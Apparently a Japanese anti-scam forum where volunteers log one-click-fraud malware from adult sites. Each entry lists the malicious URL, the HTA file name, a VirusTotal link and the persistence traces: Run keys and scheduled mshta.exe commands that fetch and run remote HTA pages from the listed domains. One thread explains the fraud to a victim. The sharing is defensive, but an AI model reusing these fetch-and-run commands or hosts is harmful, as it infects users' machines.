C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWriteZeSZquPxxNlYtflqrnOQwQiBdoZl8aed] C:\Users\Cerberus\SoftRecovery\RegWriting.lnk O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe http://ani74da.info/set_inf2.php?cccid=ZeSZquPxxNlYtflqrnOQwQiBdoZl8aed The link place of "SystemFile" C:\Users\Cerberus\UserProfile\htmlapp.exe http://ani74da.info/reg2.php?cccid=ZeSZquPxxNlYtflqrnOQwQiBdoZl8aed Startup on Registory HKCU:Run RegWriteZeSZquPxxNlYtflqrnOQwQiBdoZl8aed C:\Users\Cerberus\SoftRecovery\RegWriting.lnk HKCU:Run SystemBootZeSZquPxxNlYtflqrnOQwQiBdoZl8aed C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://ani74da.info/set_inf2.php?cccid=ZeSZquPxxNlYtflqrnOQwQiBdoZl8aed</Arguments> JPPorn - いぬ 2011/12/27(Tue) 23:33 No.22705 ワンクリウェア入り http://beauty-porn.info/ File name 「MovieID_RfcTOra1TQQKFHgRp7BbFmvorQpwFjPP.hta」 http://www.virustotal.com/file-scan/report.html?id=76a3641433dae696f70a56cfcfe52d456f7483cde1485ec689c0bf1343a49b0b-1324992300 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootRfcTOra1TQQKFHgRp7BbFmvorQpwFjPP] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteRfcTOra1TQQKFHgRp7BbFmvorQpwFjPP] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://beauty-porn.info/set_inf2.php?cccid=RfcTOra1TQQKFHgRp7BbFmvorQpwFjPP The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://beauty-porn.info/reg2.php?cccid=RfcTOra1TQQKFHgRp7BbFmvorQpwFjPP Startup on Registory HKCU:Run SystemBootRfcTOra1TQQKFHgRp7BbFmvorQpwFjPP C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWriteRfcTOra1TQQKFHgRp7BbFmvorQpwFjPP C:\Users\Cerberus\SoftRecovery\RegWrite.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://beauty-porn.info/set_inf2.php?cccid=RfcTOra1TQQKFHgRp7BbFmvorQpwFjPP</Arguments> -------------------------------------------------------- http://teens-porn.info/ File name 「MovieID_37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU.hta」 http://www.virustotal.com/file-scan/report.html?id=89b63c062da5c9ea2b12f7128228f2d392e2827f5c9818f993c332952284a6d2-1325251910 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://teens-porn.info/set_inf2.php?cccid=37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://teens-porn.info/reg2.php?cccid=37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU Startup on Registory HKCU:Run [RegWrite37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBoot37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://teens-porn.info/set_inf2.php?cccid=37gZVQw8k3bnOgnp2uyupj6Zn3HheSnU</Arguments> Japanese Movies - いぬ 2011/12/28(Wed) 21:38 No.22706 ワンクリウェア入り http://ro74er.info/ File name 「MovieID_XQ7kX57cx7rtdlXUC4j77w8clYz2Jnar.hta」 http://www.virustotal.com/file-scan/report.html?id=d4daaa252af5e1dcf5ffd94d0b8b33ecda41ce63c7ae564287823ad4da28fa94-1325072962 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootXQ7kX57cx7rtdlXUC4j77w8clYz2Jnar] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteXQ7kX57cx7rtdlXUC4j77w8clYz2Jnar] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://ro74er.info/set_inf2.php?cccid=XQ7kX57cx7rtdlXUC4j77w8clYz2Jnar The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://ro74er.info/reg2.php?cccid=XQ7kX57cx7rtdlXUC4j77w8clYz2Jnar Startup on Registory HKCU:Run SystemBootXQ7kX57cx7rtdlXUC4j77w8clYz2Jnar C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWriteXQ7kX57cx7rtdlXUC4j77w8clYz2Jnar C:\Users\Cerberus\SoftRecovery\RegWrite.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://ro74er.info/set_inf2.php?cccid=XQ7kX57cx7rtdlXUC4j77w8clYz2Jnar</Arguments> アダルトサイト - いぬ 2011/12/28(Wed) 23:17 No.22707 ワンクリウェア入り http://6k0.orangebird.biz/ http://(いろいろある).orangebird.biz/ File name 「FlvPlayer.hta」 http://www.virustotal.com/file-scan/report.html?id=bb5249bef66b5f2b5acfead47c17e2a92db495a3077414dbe95edd89c11ef458-1325080522 C:\Users\Cerberus\AppData\Roaming\Identities\TosMsgAgt.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [Dojino(Xpointyr)] "C:\Users\Cerberus\AppData\Roaming\Lunascape\Xpointyr.lnk" O4 - HKCU\..\Run: [Saourn53508_687419503] "C:\Windows\system32\mshta" http://2568.cidsave.info/avg33o/yuoEtGDqM8~AOljMcjrYEg.htm The link place of "Xpointyr" C:\Users\Cerberus\AppData\Roaming\Identities\TosMsgAgt.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Lunascape\MalachiteBcdm.bak" Startup on Registory HKCU:Run Dojino(Xpointyr) "C:\Users\Cerberus\AppData\Roaming\Lunascape\Xpointyr.lnk" HKCU:Run Saourn53508_687419503 "C:\Windows\system32\mshta" http://2568.cidsave.info/avg33o/yuoEtGDqM8~AOljMcjrYEg.htm Japanese Movies - いぬ 2011/12/29(Thu) 20:35 No.22710 ワンクリウェア入り http://jkie565j.info/ File name 「MovieID_vV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz.hta」 http://www.virustotal.com/file-scan/report.html?id=33362001c2cae17828c2a779ed453c8660742f54025a8a56aca1adb6aaa57495-1325133210 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootvV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWritevV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegisWrite" C:\Windows\System32\mshta.exe http://jkie565j.info/set_inf2.php?cccid=vV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://jkie565j.info/reg2.php?cccid=vV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz Startup on Registory HKCU:Run SystemBootvV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWritevV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz C:\Users\Cerberus\SoftRecovery\RegWrite.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://jkie565j.info/set_inf2.php?cccid=vV2g9vSL5nnkpUZxgYuqiSj7pdgW1VEz</Arguments> アダルト見放題 - いぬ 2011/12/30(Fri) 23:38 No.22711 ワンクリウェア入り http://saturn.hinckleyspringspeony.net/ http://hinckleyspringspeony.net/ http://*.hinckleyspringspeony.net/ File name 「sexsixnine_1325246795.hta」 Kaspersky 9.0.0.837 2011.12.30 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=e645ea651e233a33957b1505fc99d9543b390c17840d362e08910c52f1f0ce59-1325246737 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [manimani_1b95431232b90120852cfadd16e16ab7000e5d308c99893d] C:\Users\Cerberus\AppData\Roaming\Mozilla\manimani_1b95431232b90120852cfadd16e16ab7000e5d308c99893d.vbs Startup on Registory HKCU:Run manimani_1b95431232b90120852cfadd16e16ab7000e5d308c99893d C:\Users\Cerberus\AppData\Roaming\Mozilla\manimani_1b95431232b90120852cfadd16e16ab7000e5d308c99893d.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Mozilla\manimani_1b95431232b90120852cfadd16e16ab7000e5d308c99893d.vbs</Command> アダルトムービー - いぬ 2011/12/30(Fri) 23:40 No.22712 ワンクリウェア入り http://sailing.mehrgarhllama.net/ http://mehrgarhllama.net/ http://*.mehrgarhllama.net/ File name 「uhouho_1325248262.hta」 Kaspersky 9.0.0.837 2011.12.30 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=f9f68ecb41b715944237f70e34b67a5d1efe3629ce3aba87ae71c51a9aa8762a-1325247829 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [horand_2d10185eaec00b34440de3b26d6085c8930ef56866075e5b] C:\Users\Cerberus\AppData\Roaming\Microsoft\horand_2d10185eaec00b34440de3b26d6085c8930ef56866075e5b.vbs Startup on Registory HKCU:Run horand_2d10185eaec00b34440de3b26d6085c8930ef56866075e5b C:\Users\Cerberus\AppData\Roaming\Microsoft\horand_2d10185eaec00b34440de3b26d6085c8930ef56866075e5b.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\horand_2d10185eaec00b34440de3b26d6085c8930ef56866075e5b.vbs</Command> Re: エッチ動画 - 浦野 秀雄 2011/12/31(Sat) 17:44 No.22713 それぞれリストに入れました。

アダルト見放題 投稿者：いぬ 投稿日：2011/12/23(Fri) 22:14 No.22689    ワンクリウェア入り http://comet.greatbearlily.net/ http://greatbearlily.net/ http://*.greatbearlily.net/ File name 「erobody_1324639546.hta」 http://r.virscan.org/8344324a1eda8b3da95ee3ce50704a8b C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs Startup on Registory KCU:Run onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs</Arguments> アダルトムービー - いぬ 2011/12/23(Fri) 22:16 No.22690 ワンクリウェア入り http://centipede.mitlalinnet.net/ http://mitlalinnet.net/ http://*.mitlalinnet.net/ File name 「analkiller_1324640620.hta」 http://www.virustotal.com/file-scan/report.html?id=71544ec4b50979aa7e5acab018403bf8bedd5286a63a73b953f0e12bdc6e7c4a-1324640158 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [matrix_ec0bbd96ac9cfb1e4c5bb07a2ab4f603f9c0b386f0f16e91] C:\Users\Cerberus\AppData\Roaming\Microsoft\matrix_ec0bbd96ac9cfb1e4c5bb07a2ab4f603f9c0b386f0f16e91.vbs Startup on Registory HKCU:Run matrix_ec0bbd96ac9cfb1e4c5bb07a2ab4f603f9c0b386f0f16e91 C:\Users\Cerberus\AppData\Roaming\Microsoft\matrix_ec0bbd96ac9cfb1e4c5bb07a2ab4f603f9c0b386f0f16e91.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\matrix_ec0bbd96ac9cfb1e4c5bb07a2ab4f603f9c0b386f0f16e91.vbs</Command> ADULT COLLECTION - いぬ 2011/12/23(Fri) 22:18 No.22691 ワンクリウェア入り http://www.the-old-head.biz/ File name 「2d44.hta」 http://www.virustotal.com/file-scan/report.html?id=1d455a84e4b399314114099095b2c5c4066ea046c2cd4ff65bb8b16256a0b014-1324641413 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta http://www.the-old-head.biz/regist2.php Japanese Movies - いぬ 2011/12/23(Fri) 22:21 No.22692 ワンクリウェア入り http://hne54h.info/ File name 「MovieID_Aab2lXR4AO1hMsy1HBrw00HmAKNTEhrn.hta」 http://www.virustotal.com/file-scan/report.html?id=455d4153e158ae1bad172b8e83a81ffb2336157c09257d24c65533264f518447-1324642253 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootAab2lXR4AO1hMsy1HBrw00HmAKNTEhrn] C:\Users\Cerberus\UserProfile\BootSystem.lnk O4 - HKCU\..\Run: [RegWriteAab2lXR4AO1hMsy1HBrw00HmAKNTEhrn] C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk 「File」 The link place of "RegisWrite" C:\Windows\System32\mshta.exe http://hne54h.info/set_inf2.php?cccid=Aab2lXR4AO1hMsy1HBrw00HmAKNTEhrn The link place of "BootSystem" C:\Users\Cerberus\UserProfile\htmlapp.exe http://hne54h.info/reg2.php?cccid=Aab2lXR4AO1hMsy1HBrw00HmAKNTEhrn Startup on Registory HKCU:Run SystemBootAab2lXR4AO1hMsy1HBrw00HmAKNTEhrn C:\Users\Cerberus\UserProfile\BootSystem.lnk HKCU:Run RegWriteAab2lXR4AO1hMsy1HBrw00HmAKNTEhrn C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk ------------------------------------------------------- http://tyimdt.info/ File name 「MovieID_Avpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L.hta」 http://www.virustotal.com/file-scan/report.html?id=281041e113f6086753f7a02a08be1dc62df5c55526778dc154455fa70e3cb413-1324731198 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootAvpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L] C:\Users\Cerberus\UserProfile\BootSystem.lnk O4 - HKCU\..\Run: [RegWriteAvpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L] C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk The link place of "RegisWrite" C:\Windows\System32\mshta.exe http://tyimdt.info/set_inf2.php?cccid=Avpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L The link place of "BootSystem" C:\Users\Cerberus\UserProfile\htmlapp.exe http://tyimdt.info/reg2.php?cccid=Avpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L Startup on Registory HKCU:Run SystemBootAvpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L C:\Users\Cerberus\UserProfile\BootSystem.lnk HKCU:Run RegWriteAvpiz1Dssx6gQnLbMsc0EhwAFLYaIP2L C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk ADULT - いぬ 2011/12/24(Sat) 22:58 No.22693 ワンクリウェア入り http://www.serpent-movies.com/ File name 「5f16.hta」 http://www.virustotal.com/file-scan/report.html?id=ffff82cf903d8cb48e87d9e141e86fa39709dccb96650bd619e0e6dcaa957848-1324686832 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.high-quality-movie.com] mshta http://www.serpent-movies.com/regist2.php ADULT DREAM - いぬ 2011/12/24(Sat) 22:59 No.22694 ワンクリウェア入り http://www.encke-channel.org/ File name 「661a.hta」 http://www.virustotal.com/file-scan/report.html?id=934df4252c819537512de36504d3cc1f7053c6a0db731e202a9f8a2bb3e21f73-1324725652 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-dream.net] mshta http://www.encke-channel.org/regist2.php JPPorn - いぬ 2011/12/24(Sat) 23:02 No.22695 ワンクリウェア入り http://lady-porn.info/ File name 「MovieID_5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB.hta」 http://www.virustotal.com/file-scan/report.html?id=c67eaaef79cf0a37db991b23435f1a611273ad66b6109765f8e16c811dc38f76-1324726720 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk The link place of "RegWrite" C:\Windows\System32\mshta.exe http://lady-porn.info/set_inf2.php?cccid=5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://lady-porn.info/reg2.php?cccid=5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB Startup on Registory HKCU:Run SystemBoot5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWrite5jZmiK9hz4t6Sywk69FJ2RVzVUYZkiJB C:\Users\Cerberus\SoftRecovery\RegWrite.lnk エロサイト - いぬ 2011/12/25(Sun) 10:22 No.22696 ワンクリウェア入り http://holding.barggoon.net/ http://barggoon.net/ http://*.barggoon.net/ File name 「bonqubon_1324773106.hta」 http://www.virustotal.com/file-scan/report.html?id=e27c3f4882efa8fc45630af78ec3454fc9267c350796367af9470495a9dab71e-1324772653 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [romanporuno_4223b63d2cf253f78df9e5ec1bda3876fd4f3a834e9f8648] C:\Users\Cerberus\AppData\Roaming\Adobe\romanporuno_4223b63d2cf253f78df9e5ec1bda3876fd4f3a834e9f8648.vbs Startup on Registory HKCU:Run romanporuno_4223b63d2cf253f78df9e5ec1bda3876fd4f3a834e9f8648 C:\Users\Cerberus\AppData\Roaming\Adobe\romanporuno_4223b63d2cf253f78df9e5ec1bda3876fd4f3a834e9f8648.vbs Task Scheduler library <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\romanporuno_4223b63d2cf253f78df9e5ec1bda3876fd4f3a834e9f8648.vbs</Command> Adult site - いぬ 2011/12/25(Sun) 10:24 No.22697 ワンクリウェア入り http://roast.teelhotmovie.net/ http://teelhotmovie.net/ http://*.teelhotmovie.net/ File name 「feratio_1324774368.hta」 http://www.virustotal.com/file-scan/report.html?id=94bd494a133e2dbe6fd24d9604da4bb4a504e2cf27a506e3c9030473869fa81c-1324773910 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [kaikanflaze_70cd2b8dbd6e10f42d1b732c2650227e2487ff93b165669e] C:\Users\Cerberus\AppData\Roaming\Lunascape\kaikanflaze_70cd2b8dbd6e10f42d1b732c2650227e2487ff93b165669e.vbs Startup on Registory HKCU:Run kaikanflaze_70cd2b8dbd6e10f42d1b732c2650227e2487ff93b165669e C:\Users\Cerberus\AppData\Roaming\Lunascape\kaikanflaze_70cd2b8dbd6e10f42d1b732c2650227e2487ff93b165669e.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Lunascape\kaikanflaze_70cd2b8dbd6e10f42d1b732c2650227e2487ff93b165669e.vbs</Command> アダルトサイト - いぬ 2011/12/25(Sun) 13:51 No.22698 http://u5e.girlscamera.org/ http://(いろいろある).girlscamera.org/ File name 「FlvPlayer.hta」 http://www.virustotal.com/file-scan/report.html?id=145f87ef0c12ed5a209508057415fde36df11f5c7a0d2f47137adcbb3c0d492f-1324786221 C:\Users\Cerberus\AppData\Roaming\Microsoft\appMgr2.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [QuahCore(QuanXGA)] "C:\Users\Cerberus\AppData\Roaming\Macromedia\QuanXGA.lnk" O4 - HKCU\..\Run: [Saourn53508_687419503] "C:\Windows\system32\mshta" http://217c.cidsave.info/agy8n81v/r0OnA59OS7HjxlRmkrtI5Q.htm The link place of "QuanXGA" C:\Users\Cerberus\AppData\Roaming\Microsoft\appMgr2.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Identities\Apatite267lpf" Startup on Registory HKCU:Run QuahCore(QuanXGA) "C:\Users\Cerberus\AppData\Roaming\Macromedia\QuanXGA.lnk" HKCU:Run Saourn53508_687419503 "C:\Windows\system32\mshta" http://217c.cidsave.info/agy8n81v/r0OnA59OS7HjxlRmkrtI5Q.htm Re: アダルト見放題 - 浦野 秀雄 2011/12/25(Sun) 19:46 No.22699 それぞれリストに入れました。

教えてください 投稿者：太郎 投稿日：2011/12/22(Thu) 11:56 No.22681    http://　www.pomdora.com/ 上記サイトの情報が無いので質問させてください 支払期限カウントダウンの消えないポップアップが出ました （それに関しては削除ツールを使用して消しました） ワンクリ詐欺サイトなんでしょうか 動画は4秒で終了でしたが出ました 興味本位で知らないサイトを使うもんじゃないと後悔しました このまま無視を決め込んで大丈夫なサイトなのかどうか教えていただければ有難いです Re: 教えてください - あかしや親爺 2011/12/22(Thu) 19:50 No.22682 ワンクリウェア削除ツールを使用したのでしょうか？ 「だったら」 名前でわかりそうなものですが？ Re: 教えてください - 太郎 2011/12/22(Thu) 23:32 No.22685 色々調べて無視してはいけないワンクリ詐欺があると書いてあったので･･･ 上記サイトの情報が自分では全く入手出来なかったのでどうなのかと思い相談させて頂きました 不愉快になってしまったのなら申し訳ありませんでした Re: 教えてください - あかしや親爺 2011/12/23(Fri) 20:22 No.22688 不愉快にはなっていませんよ？ ＞上記サイトの情報が自分では全く入手出来なかったのでどうなのかと思い相談させて頂きました では、情報が全く無い中でアドバイスを行う私などは、どうやってアドバイスするのです？ 「手口」で判断するのですよ。 ワンクリック詐欺に仕込まれているマルウェアということからワンクリウェアと名付けられました。 ワンクリウェア削除ツールで消えたのなら、ワンクリック詐欺のマルウェア削除ツールで消えたのです。 色々調べているみたいですが・・・ エロサイトで動画・画像を有料で運営すると、それは通信販売に該当します。 よって、特定商取引法に沿った形で運営しなければなりません。 最低でも契約書は作成しなければなりません。 個人情報の記載を求め、支払い方法の内容の確認など、契約書のような形にして、双方に残す工夫が運営者側には求められます。 クリックしただけで、IPアドレスなどで個人情報を「調べる」？ これのどこが「契約書の作成」なのでしょうか？ IPアドレスや携帯電話情報などは「端末の情報」であり、個人情報ではありません。 また、それらを元に、個人情報を調べるにしても、個人情報保護法などが障壁となり、警察の捜査など以外ではまず開示に応じません。 どうですか？ ワンクリック詐欺ではありませんか？ 判断できませんか？

JPPorn 投稿者：いぬ 投稿日：2011/12/20(Tue) 22:02 No.22676    ワンクリウェア入り http://girls-porn.info/ File name 「MovieID_ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf.hta」 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootROGy6Ar6HagJIlnctGgiILtdhWtP5gkf] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteROGy6Ar6HagJIlnctGgiILtdhWtP5gkf] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk The link place of "RegWrite" C:\Windows\System32\mshta.exe http://girls-porn.info/set_inf2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://girls-porn.info/reg2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf Startup on Registory HKCU:Run SystemBootROGy6Ar6HagJIlnctGgiILtdhWtP5gkf C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWriteROGy6Ar6HagJIlnctGgiILtdhWtP5gkf C:\Users\Cerberus\SoftRecovery\RegWrite.lnk ----------------------------------------------------- http://erotic-porn.info/ File name 「MovieID_74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh.hta」 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk The link place of "RegWrite" C:\Windows\System32\mshta.exe http://erotic-porn.info/set_inf2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://erotic-porn.info/reg2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh Startup on Registory HKCU:Run SystemBoot74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWrite74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh C:\Users\Cerberus\SoftRecovery\RegWrite.lnk Japanese Movies - いぬ 2011/12/20(Tue) 22:05 No.22677 ワンクリウェア入り http://omen5o.info/ File name 「MovieID_6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R.hta」 http://www.virustotal.com/file-scan/report.html?id=b03c994881f97587d50bbd7b38e070c3b619adeee636480b5bd645d5b14fb08b-1324378444 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk The link place of "RegWrite" C:\Windows\System32\mshta.exe http://omen5o.info/set_inf2.php?cccid=6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://omen5o.info/reg2.php?cccid=6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R Startup on Registory HKCU:Run SystemBoot6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWrite6Bp7QZrWN5FV7c2VRx6xcY6p2kV58B6R C:\Users\Cerberus\SoftRecovery\RegWrite.lnk ------------------------------------------------------ http://ko845pk.info/ File name 「MovieID_5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB.hta」 http://www.virustotal.com/file-scan/report.html?id=f6750d528013c5b1b22496d84de7f62222a0e53edbd306781dd039f56a798e43-1324554965 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB] C:\Users\Cerberus\UserProfile\BootSystem.lnk O4 - HKCU\..\Run: [RegWrite5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB] C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk The link place of "RegisWrite" C:\Windows\System32\mshta.exe http://hne54h.info/set_inf2.php?cccid=5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB The link place of "BootSystem" C:\Users\Cerberus\UserProfile\htmlapp.exe http://hne54h.info/reg2.php?cccid=5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB Startup on Registory HKCU:Run SystemBoot5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB C:\Users\Cerberus\UserProfile\BootSystem.lnk HKCU:Run RegWrite5Hx7TQOBESZfxD32pCIABxbmyOSa2cbB C:\Users\Cerberus\SoftRecovery\RegisWrite.lnk Mountech.Info - いぬ 2011/12/21(Wed) 21:46 No.22680 ワンクリウェア入り http://www.mountech.info/ File name 「MovieLoader.hta」 http://www.virustotal.com/file-scan/report.html?id=e4eb216c9dc8725874f42b107349c5910a270a12a7e879a42fb6de75511089cf-1324467455 C:\Documents and Settings\ねこ王\Application Data\Macromedia\TosMsgAgt.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [piaybblige] "C:\Documents and Settings\ねこ王\Application Data\Adobe\bblige" O4 - HKCU\..\Run: [later31528_177627703] "C:\WINDOWS\system32\mshta" http://e9e9.mountech.info/db85r/uoH8e380mQHc9s-C6ouNZQ.htm The link place of "bblige" "C:\Documents and Settings\ねこ王\Application Data\Macromedia\TosMsgAgt.exe" //B //E:VBScript.Encode "C:\Documents and Settings\ねこ王\Application Data\Adobe\apply958Mm.cnf" apply958Mm.cnfは短縮ダイヤル Startup on Registory HKCU:Run piaybblige "C:\Documents and Settings\ねこ王\Application Data\Adobe\bblige" HKCU:Run later31528_177627703 "C:\WINDOWS\system32\mshta" http://e9e9.mountech.info/db85r/uoH8e380mQHc9s-C6ouNZQ.htm アダルトサイト - いぬ 2011/12/22(Thu) 21:55 No.22683 ワンクリウェア入り http://fasciatus.flowerdesk.info/ 